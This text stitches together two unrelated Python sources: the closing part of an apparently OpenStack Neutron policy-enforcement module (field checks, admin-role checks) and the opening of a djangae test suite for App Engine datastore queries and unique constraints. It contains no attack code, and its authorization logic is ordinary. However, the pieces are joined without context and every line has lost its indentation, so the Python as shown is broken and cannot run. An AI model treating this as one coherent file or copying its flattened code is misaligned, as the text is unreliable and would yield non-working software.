LOG.exception(_('Policy check error while calling %s!'), f)
raise
match = self.match % target
if self.kind in creds:
return match == unicode(creds[self.kind])
return False
@policy.register('field')
class FieldCheck(policy.Check):
def __init__(self, kind, match):
# Process the match
resource, field_value = match.split(':', 1)
field, value = field_value.split('=', 1)
super(FieldCheck, self).__init__(kind, '%s:%s:%s' %
(resource, field, value))
# Value might need conversion - we need help from the attribute map
try:
attr = attributes.RESOURCE_ATTRIBUTE_MAP[resource][field]
conv_func = attr['convert_to']
except KeyError:
conv_func = lambda x: x
self.field = field
self.value = conv_func(value)
def __call__(self, target_dict, cred_dict):
target_value = target_dict.get(self.field)
# target_value might be a boolean, explicitly compare with None
if target_value is None:
LOG.debug(_("Unable to find requested field: %(field)s in "
"target: %(target_dict)s"),
{'field': self.field,
'target_dict': target_dict})
return False
return target_value == self.value
def _prepare_check(context, action, target):
"""Prepare rule, target, and credentials for the policy engine."""
init()
# Compare with None to distinguish case in which target is {}
if target is None:
target = {}
match_rule = _build_match_rule(action, target)
credentials = context.to_dict()
return match_rule, target, credentials
def check(context, action, target, plugin=None):
"""Verifies that the action is valid on the target in this context.
:param context: neutron context
:param action: string representing the action to be checked
this should be colon separated for clarity.
:param target: dictionary representing the object of the action
for object creation this should be a dictionary representing the
location of the object e.g. ``{'project_id': context.project_id}``
:param plugin: currently unused and deprecated.
Kept for backward compatibility.
:return: Returns True if access is permitted else False.
"""
return policy.check(*(_prepare_check(context, action, target)))
def check_if_exists(context, action, target):
"""Verify if the action can be authorized, and raise if it is unknown.
Check whether the action can be performed on the target within this
context, and raise a PolicyRuleNotFound exception if the action is
not defined in the policy engine.
"""
# TODO(salvatore-orlando): Consider modifying oslo policy engine in
# order to allow to raise distinct exception when check fails and
# when policy is missing
# Raise if there's no match for requested action in the policy engine
if not policy._rules or action not in policy._rules:
raise exceptions.PolicyRuleNotFound(rule=action)
return policy.check(*(_prepare_check(context, action, target)))
def enforce(context, action, target, plugin=None):
"""Verifies that the action is valid on the target in this context.
:param context: neutron context
:param action: string representing the action to be checked
this should be colon separated for clarity.
:param target: dictionary representing the object of the action
for object creation this should be a dictionary representing the
location of the object e.g. ``{'project_id': context.project_id}``
:param plugin: currently unused and deprecated.
Kept for backward compatibility.
:raises neutron.exceptions.PolicyNotAllowed: if verification fails.
"""
init()
rule, target, credentials = _prepare_check(context, action, target)
return policy.check(rule, target, credentials,
exc=exceptions.PolicyNotAuthorized, action=action)
def check_is_admin(context):
"""Verify context has admin rights according to policy settings."""
init()
# the target is user-self
credentials = context.to_dict()
target = credentials
# Backward compatibility: if ADMIN_CTX_POLICY is not
# found, default to validating role:admin
admin_policy = (ADMIN_CTX_POLICY in policy._rules
and ADMIN_CTX_POLICY or 'role:admin')
return policy.check(admin_policy, target, credentials)
def _extract_roles(rule, roles):
if isinstance(rule, policy.RoleCheck):
roles.append(rule.match.lower())
elif isinstance(rule, policy.RuleCheck):
_extract_roles(policy._rules[rule.match], roles)
elif hasattr(rule, 'rules'):
for rule in rule.rules:
_extract_roles(rule, roles)
def get_admin_roles():
"""Return a list of roles which are granted admin rights according
to policy settings.
"""
# NOTE(salvatore-orlando): This function provides a solution for
# populating implicit contexts with the appropriate roles so that
# they correctly pass policy checks, and will become superseded
# once all explicit policy checks are removed from db logic and
# plugin modules. For backward compatibility it returns the literal
# admin if ADMIN_CTX_POLICY is not defined
init()
if not policy._rules or ADMIN_CTX_POLICY not in policy._rules:
return ['admin']
try:
admin_ctx_rule = policy._rules[ADMIN_CTX_POLICY]
except (KeyError, TypeError):
return
roles = []
_extract_roles(admin_ctx_rule, roles)
return roles
| |
import datetime
import decimal
import re
import random
from cStringIO import StringIO
from string import letters
from hashlib import md5
# LIBRARIES
from django.core.files.uploadhandler import StopFutureHandlers
from django.core.cache import cache
from django.core.exceptions import ValidationError
from django.db import DataError, models
from django.db.models.query import Q
from django.forms import ModelForm
from django.test import RequestFactory
from django.utils.safestring import SafeText
from django.forms.models import modelformset_factory
from google.appengine.api.datastore_errors import EntityNotFoundError, BadValueError
from google.appengine.api import datastore
from google.appengine.ext import deferred
from google.appengine.api import taskqueue
from django.test.utils import override_settings
from django.core.exceptions import FieldError
from django.template import Template, Context
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import inconsistent_db, TestCase
from django.db import IntegrityError, NotSupportedError
from djangae.db.constraints import UniqueMarker, UniquenessMixin
from djangae.db.unique_utils import _unique_combinations, unique_identifiers_from_entity
from djangae.db.backends.appengine.indexing import add_special_index
from djangae.db.utils import entity_matches_query, decimal_to_string, normalise_field_value
from djangae.db.caching import disable_cache
from djangae.fields import SetField, ListField, RelatedSetField
from djangae.storage import BlobstoreFileUploadHandler
from djangae.core import paginator
try:
import webtest
except ImportError:
webtest = NotImplemented
class TestUser(models.Model):
username = models.CharField(max_length=32)
email = models.EmailField()
last_login = models.DateField(auto_now_add=True)
field2 = models.CharField(max_length=32)
def __unicode__(self):
return self.username
class Meta:
app_label = "djangae"
class ModelWithNullableCharField(models.Model):
field1 = models.CharField(max_length=500, null=True)
some_id = models.IntegerField(default=0)
class Meta:
app_label = "djangae"
class UniqueModel(models.Model):
unique_field = models.CharField(max_length=100, unique=True)
unique_combo_one = models.IntegerField(blank=True, default=0)
unique_combo_two = models.CharField(max_length=100, blank=True, default="")
unique_relation = models.ForeignKey('self', null=True, blank=True, unique=True)
unique_set_field = SetField(models.CharField(max_length=500), unique=True)
unique_list_field = ListField(models.CharField(max_length=500), unique=True)
unique_together_list_field = ListField(models.IntegerField())
class Meta:
unique_together = [
("unique_combo_one", "unique_combo_two"),
("unique_together_list_field", "unique_combo_one")
]
app_label = "djangae"
class UniqueModelWithLongPK(models.Model):
long_pk = models.CharField(max_length=500, primary_key=True)
unique_field = models.IntegerField(unique=True)
class IntegerModel(models.Model):
integer_field = models.IntegerField()
class Meta:
app_label = "djangae"
class TestFruit(models.Model):
name = models.CharField(primary_key=True, max_length=32)
origin = models.CharField(max_length=32, default="Unknown")
color = models.CharField(max_length=100)
is_mouldy = models.BooleanField(default=False)
class Meta:
ordering = ("color",)
app_label = "djangae"
def __unicode__(self):
return self.name
def __repr__(self):
return "<TestFruit: name={}, color={}>".format(self.name, self.color)
class Permission(models.Model):
user = models.ForeignKey(TestUser)
perm = models.CharField(max_length=32)
def __unicode__(self):
return u"{0} for {1}".format(self.perm, self.user)
class Meta:
ordering = ('user__username', 'perm')
app_label = "djangae"
class SelfRelatedModel(models.Model):
related = models.ForeignKey('self', blank=True, null=True)
class Meta:
app_label = "djangae"
class MultiTableParent(models.Model):
parent_field = models.CharField(max_length=32)
class Meta:
app_label = "djangae"
class MultiTableChildOne(MultiTableParent):
child_one_field = models.CharField(max_length=32)
class Meta:
app_label = "djangae"
class MultiTableChildTwo(MultiTableParent):
child_two_field = models.CharField(max_length=32)
class Meta:
app_label = "djangae"
class Relation(models.Model):
class Meta:
app_label = "djangae"
class Related(models.Model):
headline = models.CharField(max_length=500)
relation = models.ForeignKey(Relation)
class Meta:
app_label = "djangae"
class NullDate(models.Model):
date = models.DateField(null=True, default=None)
datetime = models.DateTimeField(null=True, default=None)
time = models.TimeField(null=True, default=None)
class Meta:
app_label = "djangae"
class NullDateSet(models.Model):
dates = RelatedSetField(NullDate, blank=True, unique=True)
class Meta:
app_label = "djangae"
class ModelWithUniques(models.Model):
name = models.CharField(max_length=64, unique=True)
class Meta:
app_label = "djangae"
class ModelWithUniquesOnForeignKey(models.Model):
name = models.CharField(max_length=64, unique=True)
related_name = models.ForeignKey(ModelWithUniques, unique=True)
class Meta:
unique_together = [("name", "related_name")]
app_label = "djangae"
class ModelWithDates(models.Model):
start = models.DateField()
end = models.DateField()
class Meta:
app_label = "djangae"
class ModelWithUniquesAndOverride(models.Model):
name = models.CharField(max_length=64, unique=True)
class Djangae:
disable_constraint_checks = False
class Meta:
app_label = "djangae"
class SpecialIndexesModel(models.Model):
name = models.CharField(max_length=255)
sample_list = ListField(models.CharField)
def __unicode__(self):
return self.name
class Meta:
app_label = "djangae"
class DateTimeModel(models.Model):
datetime_field = models.DateTimeField(auto_now_add=True)
date_field = models.DateField(auto_now_add=True)
class Meta:
app_label = "djangae"
class PaginatorModel(models.Model):
foo = models.IntegerField()
class Meta:
app_label = "djangae"
class BackendTests(TestCase):
def test_entity_matches_query(self):
entity = datastore.Entity("test_model")
entity["name"] = "Charlie"
entity["age"] = 22
query = datastore.Query("test_model")
query["name ="] = "Charlie"
self.assertTrue(entity_matches_query(entity, query))
query["age >="] = 5
self.assertTrue(entity_matches_query(entity, query))
del query["age >="]
query["age <"] = 22
self.assertFalse(entity_matches_query(entity, query))
del query["age <"]
query["age <="] = 22
self.assertTrue(entity_matches_query(entity, query))
del query["age <="]
query["name ="] = "Fred"
self.assertFalse(entity_matches_query(entity, query))
# If the entity has a list field, then if any of them match the
# query then it's a match
entity["name"] = [ "Bob", "Fred", "Dave" ]
self.assertTrue(entity_matches_query(entity, query)) # ListField test
def test_defaults(self):
fruit = TestFruit.objects.create(name="Apple", color="Red")
self.assertEqual("Unknown", fruit.origin)
instance = datastore.Get(datastore.Key.from_path(TestFruit._meta.db_table, fruit.pk))
del instance["origin"]
datastore.Put(instance)
fruit = TestFruit.objects.get()
self.assertIsNone(fruit.origin)
fruit.save()
fruit = TestFruit.objects.get()
self.assertEqual("Unknown", fruit.origin)
@disable_cache()
def test_get_by_keys(self):
colors = [ "Red", "Green", "Blue", "Yellow", "Orange" ]
fruits = [ TestFruit.objects.create(name=str(x), color=random.choice(colors)) for x in range(32) ]
# Check that projections work with key lookups
with sleuth.watch('google.appengine.api.datastore.Query.__init__') as query_init:
with sleuth.watch('google.appengine.api.datastore.Query.Ancestor') as query_anc:
TestFruit.objects.only("color").get(pk="0").color
self.assertEqual(query_init.calls[0].kwargs["projection"], ["color"])
# Make sure the query is an ancestor of the key
self.assertEqual(query_anc.calls[0].args[1], datastore.Key.from_path(TestFruit._meta.db_table, "0"))
# Now check projections work with more than 30 things
with sleuth.watch('google.appengine.api.datastore.MultiQuery.__init__') as query_init:
with sleuth.watch('google.appengine.api.datastore.Query.Ancestor') as query_anc:
keys = [str(x) for x in range(32)]
results = list(TestFruit.objects.only("color").filter(pk__in=keys).order_by("name"))
self.assertEqual(query_init.call_count, 2) # Two multi queries
self.assertEqual(query_anc.call_count, 32) # 32 Ancestor calls
self.assertEqual(len(query_init.calls[0].args[1]), 30)
self.assertEqual(len(query_init.calls[1].args[1]), 2)
# Confirm the ordering is correct
self.assertEqual(sorted(keys), [ x.pk for x in results ])
results = list(TestFruit.objects.only("color").filter(pk__in=keys).order_by("name")[5:10])
self.assertEqual(len(results), 5)
self.assertEqual([x.pk for x in results], sorted(keys)[5:10])
# Make sure we can do a normal (non-projection) get by keys
self.assertItemsEqual(TestFruit.objects.filter(pk__in=keys), fruits)
def test_get_or_create(self):
"""
Django's get_or_create can do the following:
1. get(**lookup) -> throws DoesNotExist
2. Catches DoesNotExist
3. create() -> throws IntegrityError
4. get(**lookup)
This test proves that we throw the right kind of error at step 3 when
unique constraints are violated.
"""
def wrap_get(func):
def _wrapped(*args, **kwargs):
try:
if _wrapped.calls == 0:
raise UniqueModel.DoesNotExist()
else:
return func(*args, **kwargs)
finally:
_wrapped.calls += 1
_wrapped.calls = 0
return _wrapped
from django.db.models import query
wrapped_get = wrap_get(query.QuerySet.get)
UniqueModel.objects.create(unique_field="Test")
with disable_cache():
with sleuth.switch("django.db.models.query.QuerySet.get", wrapped_get):
instance, created = UniqueModel.objects.get_or_create(unique_field="Test")
self.assertFalse(created)
def test_setting_non_null_null_throws_integrity_error(self):
with self.assertRaises(IntegrityError):
IntegerModel.objects.create(integer_field=None)
with self.assertRaises(IntegrityError):
instance = IntegerModel()
instance.integer_field = None
instance.save()
with self.assertRaises(IntegrityError):
instance = IntegerModel.objects.create(integer_field=1)
instance = IntegerModel.objects.get()
instance.integer_field = None
instance.save()
def test_normalise_field_value(self):
self.assertEqual(u'0000475231073257', normalise_field_value(decimal.Decimal(475231073257)))
self.assertEqual(u'-0000475231073257', normalise_field_value(decimal.Decimal(-475231073257)))
self.assertEqual(u'0000000004752311', normalise_field_value(decimal.Decimal(4752310.73257)))
self.assertEqual(u'0000004752310733', normalise_field_value(decimal.Decimal(4752310732.57)))
self.assertEqual(datetime.datetime(2015, 1, 27, 2, 46, 8, 584258), normalise_field_value(datetime.datetime(2015, 1, 27, 2, 46, 8, 584258)))
def test_decimal_to_string(self):
self.assertEqual(u'0002312487812767', decimal_to_string(decimal.Decimal(2312487812767)))
self.assertEqual(u'-0002312487812767', decimal_to_string(decimal.Decimal(-2312487812767)))
self.assertEqual(u'002312487812', decimal_to_string(decimal.Decimal(2312487812), 12))
self.assertEqual(u'002387812.320', decimal_to_string(decimal.Decimal(2387812.32), 12, 3))
self.assertEqual(u'-002387812.513', decimal_to_string(decimal.Decimal(-2387812.513212), 12, 3))
self.assertEqual(u'0237812.000', decimal_to_string(decimal.Decimal(237812), 10, 3))
self.assertEqual(u'-0237812.210', decimal_to_string(decimal.Decimal(-237812.21), 10, 3))
def test_gae_conversion(self):
# A PK IN query should result in a single get by key
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.Get", lambda *args, **kwargs: []) as get_mock:
list(TestUser.objects.filter(pk__in=[1, 2, 3])) # Force the query to run
self.assertEqual(1, get_mock.call_count)
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.Query.Run", lambda *args, **kwargs: []) as query_mock:
list(TestUser.objects.filter(username="test"))
self.assertEqual(1, query_mock.call_count)
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.MultiQuery.Run", lambda *args, **kwargs: []) as query_mock:
list(TestUser.objects.filter(username__in=["test", "cheese"]))
self.assertEqual(1, query_mock.call_count)
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.Get", lambda *args, **kwargs: []) as get_mock:
list(TestUser.objects.filter(pk=1))
self.assertEqual(1, get_mock.call_count)
#FIXME: Issue #80
with self.assertRaises(NotSupportedError):
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.MultiQuery.Run", lambda *args, **kwargs: []) as query_mock:
list(TestUser.objects.exclude(username__startswith="test"))
self.assertEqual(1, query_mock.call_count)
with sleuth.switch("djangae.db.backends.appengine.commands.datastore.Get", lambda *args, **kwargs: []) as get_mock:
list(TestUser.objects.filter(pk__in=[1, 2, 3, 4, 5, 6, 7, 8]).
filter(username__in=["test", "test2", "test3"]).filter(email__in=["test@example.com", "test2@example.com"]))
self.assertEqual(1, get_mock.call_count)
def test_range_behaviour(self):
IntegerModel.objects.create(integer_field=5)
IntegerModel.objects.create(integer_field=10)
IntegerModel.objects.create(integer_field=15)
self.assertItemsEqual([10], IntegerModel.objects.filter(integer_field__range=(6, 14)).values_list("integer_field", flat=True))
self.assertItemsEqual([5, 10, 15], IntegerModel.objects.filter(integer_field__range=(5, 15)).order_by("integer_field").values_list("integer_field", flat=True))
self.assertItemsEqual([5, 15], IntegerModel.objects.exclude(integer_field__range=(6, 14)).values_list("integer_field", flat=True))
def test_exclude_nullable_field(self):
instance = ModelWithNullableCharField.objects.create(some_id=999) # Create a nullable thing
instance2 = ModelWithNullableCharField.objects.create(some_id=999, field1="test") # Create a nullable thing
self.assertItemsEqual([instance], ModelWithNullableCharField.objects.filter(some_id=999).exclude(field1="test").all())
instance.field1 = "bananas"
instance.save()
self.assertEqual(instance, ModelWithNullableCharField.objects.filter(some_id=999).exclude(field1="test")[0])
def test_null_date_field(self):
null_date = NullDate()
null_date.save()
null_date = NullDate.objects.get()
self.assertIsNone(null_date.date)
self.assertIsNone(null_date.time)
self.assertIsNone(null_date.datetime)
def test_convert_unicode_subclasses_to_unicode(self):
# The App Engine SDK raises BadValueError if you try saving a SafeText
# string to a CharField. Djangae explicitly converts it to unicode.
grue = SafeText(u'grue')
self.assertIsInstance(grue, unicode)
self.assertNotEqual(type(grue), unicode)
obj = TestFruit.objects.create(name=u'foo', color=grue)
obj = TestFruit.objects.get(pk=obj.pk)
self.assertEqual(type(obj.color), unicode)
obj = TestFruit.objects.filter(color=grue)[0]
self.assertEqual(type(obj.color), unicode)
def test_notsupportederror_thrown_on_too_many_inequalities(self):
TestFruit.objects.create(name="Apple", color="Green", origin="England")
pear = TestFruit.objects.create(name="Pear", color="Green")
banana = TestFruit.objects.create(name="Banana", color="Yellow")
# Excluding one field is fine
self.assertItemsEqual([pear, banana], list(TestFruit.objects.exclude(name="Apple")))
# Excluding a field, and doing a > or < on another is not so fine
with self.assertRaises(NotSupportedError):
self.assertEqual(pear, TestFruit.objects.exclude(origin="England").filter(color__lt="Yellow").get())
# Same with excluding two fields
with self.assertRaises(NotSupportedError):
list(TestFruit.objects.exclude(origin="England").exclude(color="Yellow"))
# But apparently excluding the same field twice is OK
self.assertItemsEqual([banana], list(TestFruit.objects.exclude(origin="England").exclude(name="Pear").order_by("origin")))
def test_excluding_pks_is_emulated(self):
apple = TestFruit.objects.create(name="Apple", color="Green", is_mouldy=True, origin="England")
banana = TestFruit.objects.create(name="Banana", color="Yellow", is_mouldy=True, origin="Dominican Republic")
cherry = TestFruit.objects.create(name="Cherry", color="Red", is_mouldy=True, origin="Germany")
pear = TestFruit.objects.create(name="Pear", color="Green", origin="England")
self.assertEqual([apple, pear], list(TestFruit.objects.filter(origin__lt="Germany").exclude(pk=banana.pk).exclude(pk=cherry.pk).order_by("origin")))
self.assertEqual([apple, cherry], list(TestFruit.objects.exclude(origin="Dominican Republic").exclude(pk=pear.pk).order_by("origin")))
self.assertEqual([], list(TestFruit.objects.filter(is_mouldy=True).filter(color="Green", origin__gt="England").exclude(pk=pear.pk).order_by("-origin")))
self.assertEqual([cherry, banana], list(TestFruit.objects.exclude(pk=pear.pk).order_by("-name")[:2]))
self.assertEqual([banana, apple], list(TestFruit.objects.exclude(pk=pear.pk).order_by("origin", "name")[:2]))
def test_datetime_fields(self):
date = datetime.datetime.today()
dt = datetime.datetime.now()
time = datetime.time(0,0,0)
# check if creating objects work
obj = NullDate.objects.create(date=date, datetime=dt, time=time)
# check if filtering objects work
self.assertItemsEqual([obj], NullDate.objects.filter(datetime=dt))
self.assertItemsEqual([obj], NullDate.objects.filter(date=date))
self.assertItemsEqual([obj], NullDate.objects.filter(time=time))
# check if updating objects work
obj.date = date + datetime.timedelta(days=1)
obj.datetime = dt + datetime.timedelta(days=1)
obj.time = datetime.time(23,0,0)
obj.save()
self.assertItemsEqual([obj], NullDate.objects.filter(datetime=obj.datetime))
self.assertItemsEqual([obj], NullDate.objects.filter(date=obj.date))
self.assertItemsEqual([obj], NullDate.objects.filter(time=obj.time))
def test_related_datetime_nullable(self):
date = datetime.datetime.today()
dt = datetime.datetime.now()
time = datetime.time(0,0,0)
date_set = NullDateSet.objects.create()
empty_obj = NullDate.objects.create(date=None, datetime=None, time=None)
date_set.dates.add(empty_obj)
obj = NullDate.objects.create(date=date, datetime=dt, time=time)
date_set.dates.add(obj)
date_set.save()
# check if filtering/excluding of None works in RelatedSetField
self.assertItemsEqual([obj], date_set.dates.filter(datetime__isnull=False))
self.assertItemsEqual([obj], date_set.dates.filter(date__isnull=False))
self.assertItemsEqual([obj], date_set.dates.filter(time__isnull=False))
self.assertItemsEqual([obj], date_set.dates.exclude(datetime=None))
self.assertItemsEqual([obj], date_set.dates.exclude(date=None))
self.assertItemsEqual([obj], date_set.dates.exclude(time=None))
# sorting should work too
self.assertItemsEqual([obj, empty_obj], date_set.dates.order_by('datetime'))
self.assertItemsEqual([empty_obj, obj], date_set.dates.order_by('-datetime'))
self.assertItemsEqual([obj, empty_obj], date_set.dates.order_by('date'))
self.assertItemsEqual([empty_obj, obj], date_set.dates.order_by('-date'))
self.assertItemsEqual([obj, empty_obj], date_set.dates.order_by('time'))
self.assertItemsEqual([empty_obj, obj], date_set.dates.order_by('-time'))
def test_update_query_does_not_update_entities_which_no_longer_match_query(self):
""" When doing queryset.update(field=x), any entities which the query returns but which no
longer match the query (due to eventual consistency) should not be altered.
"""
obj = TestFruit.objects.create(name='apple', color='green', is_mouldy=False)
with inconsistent_db(probability=0):
# alter our object, so that it should no longer match the query that we then do
obj.color = 'blue'
obj.save()
# Now run a query, our object is changed, but the inconsistency means it will still match
queryset = TestFruit.objects.filter(color='green')
assert queryset.count(), "inconsistent_db context manager isn't working" # sanity
# Now run an update with that query, the update should NOT be applied, because it
# should re-check that the object still matches the query
queryset.update(is_mouldy=True)
obj = TestFruit.objects.get(pk=obj.pk)
self.assertFalse(obj.is_mouldy)
class ModelFormsetTest(TestCase):
def test_reproduce_index_error(self):
class TestModelForm(ModelForm):
class Meta:
model = TestUser
fields = ("username", "email", "field2")
test_model = TestUser.objects.create(username='foo', field2='bar')
TestModelFormSet = modelformset_factory(TestUser, form=TestModelForm, extra=0)
TestModelFormSet(queryset=TestUser.objects.filter(pk=test_model.pk))
data = {
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': 0,
'form-TOTAL_FORMS': 0,
'form-0-id': test_model.id,
'form-0-field1': 'foo_1',
'form-0-field2': 'bar_1',
}
factory = RequestFactory()
request = factory.post('/', data=data)
TestModelFormSet(request.POST, request.FILES)
class CacheTests(TestCase):
def test_cache_set(self):
cache.set('test?', 'yes!')
self.assertEqual(cache.get('test?'), 'yes!')
def test_cache_timeout(self):
cache.set('test?', 'yes!', 1)
import time
time.sleep(1)
self.assertEqual(cache.get('test?'), None)
class ConstraintTests(TestCase):
"""
Tests for unique constraint handling
"""
def test_update_updates_markers(self):
initial_count = datastore.Query(UniqueMarker.kind()).Count()
instance = ModelWithUniques.objects.create(name="One")
self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
qry = datastore.Query(UniqueMarker.kind())
qry.Order(("created", datastore.Query.DESCENDING))
marker = [x for x in qry.Run()][0]
# Make sure we assigned the instance
self.assertEqual(marker["instance"], datastore.Key.from_path(instance._meta.db_table, instance.pk))
expected_marker = "{}|name:{}".format(ModelWithUniques._meta.db_table, md5("One").hexdigest())
self.assertEqual(expected_marker, marker.key().id_or_name())
instance.name = "Two"
instance.save()
self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
marker = [x for x in qry.Run()][0]
# Make sure we assigned the instance
self.assertEqual(marker["instance"], datastore.Key.from_path(instance._meta.db_table, instance.pk))
expected_marker = "{}|name:{}".format(ModelWithUniques._meta.db_table, md5("Two").hexdigest())
self.assertEqual(expected_marker, marker.key().id_or_name())
def test_conflicting_insert_throws_integrity_error(self):
ModelWithUniques.objects.create(name="One")
with self.assertRaises(IntegrityError):
ModelWithUniques.objects.create(name="One")
def test_table_flush_clears_markers_for_that_table(self):
ModelWithUniques.objects.create(name="One")
UniqueModel.objects.create(unique_field="One")
from djangae.db.backends.appengine.commands import FlushCommand
FlushCommand(ModelWithUniques._meta.db_table).execute()
ModelWithUniques.objects.create(name="One")
with self.assertRaises(IntegrityError):
UniqueModel.objects.create(unique_field="One")
def test_recently_deleted_unique_doesnt_come_back(self):
instance = ModelWithUniques.objects.create(name="One")
with inconsistent_db():
instance.delete()
self.assertEqual(0, ModelWithUniques.objects.filter(name="One").count())
self.assertFalse(ModelWithUniques.objects.filter(name="One").exists())
self.assertFalse(list(ModelWithUniques.objects.all())) # Triple-check
def test_conflicting_update_throws_integrity_error(self):
ModelWithUniques.objects.create(name="One")
instance = ModelWithUniques.objects.create(name="Two")
with self.assertRaises(IntegrityError):
instance.name = "One"
instance.save()
def test_unique_combinations_are_returned_correctly(self):
combos_one = _unique_combinations(ModelWithUniquesOnForeignKey, ignore_pk=True)
combos_two = _unique_combinations(ModelWithUniquesOnForeignKey, ignore_pk=False)
self.assertEqual([['name', 'related_name'], ['name'], ['related_name']], combos_one)
self.assertEqual([['name', 'related_name'], ['id'], ['name'], ['related_name']], combos_two)
class Entity(dict):
def __init__(self, model, id):
self._key = datastore.Key.from_path(model, id)
def key(self):
return self._key
e1 = Entity(ModelWithUniquesOnForeignKey._meta.db_table, 1)
e1["name"] = "One"
e1["related_name_id"] = 1
ids_one = unique_identifiers_from_entity(ModelWithUniquesOnForeignKey, e1)
self.assertItemsEqual([
u'djangae_modelwithuniquesonforeignkey|id:1',
u'djangae_modelwithuniquesonforeignkey|name:06c2cea18679d64399783748fa367bdd',
u'djangae_modelwithuniquesonforeignkey|related_name_id:1',
u'djangae_modelwithuniquesonforeignkey|name:06c2cea18679d64399783748fa367bdd|related_name_id:1'
], ids_one)
def test_error_on_update_doesnt_change_markers(self):
initial_count = datastore.Query(UniqueMarker.kind()).Count()
instance = ModelWithUniques.objects.create(name="One")
self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
qry = datastore.Query(UniqueMarker.kind())
qry.Order(("created", datastore.Query.DESCENDING))
marker = [ x for x in qry.Run()][0]
# Make sure we assigned the instance
self.assertEqual(marker["instance"], datastore.Key.from_path(instance._meta.db_table, instance.pk))
expected_marker = "{}|name:{}".format(ModelWithUniques._meta.db_table, md5("One").hexdigest())
self.assertEqual(expected_marker, marker.key().id_or_name())
instance.name = "Two"
from djangae.db.backends.appengine.commands import datastore as to_patch
try:
original = to_patch.Put
def func(*args, **kwargs):
kind = args[0][0].kind() if isinstance(args[0], list) else args[0].kind()
if kind == UniqueMarker.kind():
return original(*args, **kwargs)
raise AssertionError()
to_patch.Put = func
with self.assertRaises(Exception):
instance.save()
finally:
to_patch.Put = original
self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
marker = [x for x in qry.Run()][0]
# Make sure we assigned the instance
self.assertEqual(marker["instance"], datastore.Key.from_path(instance._meta.db_table, instance.pk))
expected_marker = "{}|name:{}".format(ModelWithUniques._meta.db_table, md5("One").hexdigest())
self.assertEqual(expected_marker, marker.key().id_or_name())
def test_error_on_insert_doesnt_create_markers(self):
initial_count = datastore.Query(UniqueMarker.kind()).Count()
from djangae.db.backends.appengine.commands import datastore as to_patch
try:
original = to_patch.Put
def func(*args, **kwargs):
kind = args[0][0].kind() if isinstance(args[0], list) else args[0].kind()
if kind == UniqueMarker.kind():
return original(*args, **kwargs)
raise AssertionError()
to_patch.Put = func
with self.assertRaises(AssertionError):
ModelWithUniques.objects.create(name="One")
finally:
to_patch.Put = original
self.assertEqual(0, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
def test_delete_clears_markers(self):
initial_count = datastore.Query(UniqueMarker.kind()).Count()
instance = ModelWithUniques.objects.create(name="One")
self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
instance.delete()
self.assertEqual(0, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
@override_settings(DJANGAE_DISABLE_CONSTRAINT_CHECKS=True)
def test_constraints_disabled_doesnt_create_or_check_markers(self):
initial_count = datastore.Query(UniqueMarker.kind()).Count()
instance1 = ModelWithUniques.objects.create(name="One")
self.assertEqual(initial_count, datastore.Query(UniqueMarker.kind()).Count())
instance2 = ModelWithUniques.objects.create(name="One")
self.assertEqual(instance1.name, instance2.name)
self.assertFalse(instance1 == instance2)
@override_settings(DJANGAE_DISABLE_CONSTRAINT_CHECKS=True)
def test_constraints_can_be_enabled_per_model(self):
initial_count = datastore.Query(UniqueMarker.kind()).Count()
ModelWithUniquesAndOverride.objects.create(name="One")
self.assertEqual(1, datastore.Query(UniqueMarker.kind()).Count() - initial_count)
def test_list_field_unique_constaints(self):
instance1 = UniqueModel.objects.create(unique_field=1, unique_combo_one=1, unique_list_field=["A", "C"])
with self.assertRaises((IntegrityError, DataError)):
UniqueModel.objects.create(unique_field=2, unique_combo_one=2, unique_list_field=["A"])
instance2 = UniqueModel.objects.create(unique_field=2, unique_combo_one=2, unique_list_field=["B"])
instance2.unique_list_field = instance1.unique_list_field
with self.assertRaises((IntegrityError, DataError)):
instance2.save()
instance1.unique_list_field = []
instance1.save()
instance2.save()
def test_list_field_unique_constraints_validation(self):
instance1 = UniqueModel(
unique_set_field={"A"},
unique_together_list_field=[1],
unique_field=1,
unique_combo_one=1,
unique_list_field=["A", "C"]
)
# Without a custom mixin, Django can't construct a unique validation query for a list field
self.assertRaises(BadValueError, instance1.full_clean)
UniqueModel.__bases__ = (UniquenessMixin,) + UniqueModel.__bases__
instance1.full_clean()
instance1.save()
# Check the uniqueness mixing works with long lists
instance1.unique_list_field = [ x for x in range(31) ]
try:
instance1.full_clean()
except NotSupportedError:
self.fail("Couldn't run unique check on long list field")
return
instance2 = UniqueModel(
unique_set_field={"B"},
unique_together_list_field=[2],
unique_field=2,
unique_combo_one=2,
unique_list_field=["B", "C"] # duplicate value C!
)
self.assertRaises(ValidationError, instance2.full_clean)
UniqueModel.__bases__ = (models.Model,)
def test_set_field_unique_constraints(self):
instance1 = UniqueModel.objects.create(unique_field=1, unique_combo_one=1, unique_set_field={"A", "C"})
with self.assertRaises((IntegrityError, DataError)):
UniqueModel.objects.create(unique_field=2, unique_combo_one=2, unique_set_field={"A"})
instance2 = UniqueModel.objects.create(unique_field=2, unique_combo_one=2, unique_set_field={"B"})
instance2.unique_set_field = instance1.unique_set_field
with self.assertRaises((IntegrityError, DataError)):
instance2.save()
instance1.unique_set_field = set()
instance1.save()
instance2.save()
instance2.unique_set_field = set()
instance2.save() # You can have two fields with empty sets
def test_unique_constraints_on_model_with_long_str_pk(self):
""" Check that an object with a string-based PK of 500 characters (the max that GAE allows)
can still have unique constraints pointing at it. (See #242.)
"""
obj = UniqueModelWithLongPK(pk="x" * 500, unique_field=1)
obj.save()
duplicate = UniqueModelWithLongPK(pk="y" * 500, unique_field=1)
self.assertRaises(IntegrityError, duplicate.save)
class EdgeCaseTests(TestCase):
def setUp(self):
super(EdgeCaseTests, self).setUp()
add_special_index(TestUser, "username", "iexact")
